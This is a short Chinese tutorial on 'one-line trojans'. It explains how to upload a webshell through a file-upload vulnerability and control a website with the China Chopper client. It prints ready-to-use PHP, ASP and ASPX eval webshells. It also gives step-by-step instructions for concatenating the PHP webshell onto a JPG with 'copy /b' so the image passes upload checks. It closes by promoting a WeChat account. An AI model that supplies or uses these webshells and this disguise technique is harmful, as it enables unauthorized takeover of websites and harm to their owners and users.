一句話木馬概念
【基本原理】利用文件上傳漏洞,往目標網站中上傳一句話木馬,然后你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄。@表示后面即使執行錯誤,也不報錯。eval()函數表示括號內的語句字符串什么的全都當做代碼執行。$_POST['attack']表示從頁面中獲得attack這個參數值。
常見的一句話木馬:
php的一句話木馬: <?php @eval($_POST['pass']);?> 或 <?php @eval($_POST['cmd']);?> 或 <?php @eval($_POST['attack']) ;?>
asp的一句話是: <%eval request ("pass")%>
aspx的一句話是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
一句話木馬制作方式
1.桌面新建一個文件夾
2.在新建的文件夾中放入三個文件,分別為圖片文件
tp.jpg,和yjh.php一句話木馬和一個寫入cmd的bat文件
tp.jpg可用任意圖片
yjh.php文件用notepad++可以創建,保存時文件名后綴改為.php即可,文件中的內容為<?php @eval($_POST['cmd']);?>
.bat文件可用筆記本創建,保存時文件名后綴改為.bat即可,文件中的內容為cmd
4.雙擊.bat文件進入DOS命令,寫入"copy tp.jpg/b+yjh.php tpyjh.jpg" 回車
5.文件夾中自動生成一個叫
tpyjh.jpg的圖片文件,這個文件中就包含一句話木馬,可以拿去上傳了, 更多網絡安全測試技術,請關注公眾號“測試運維”,關注測試技術發展;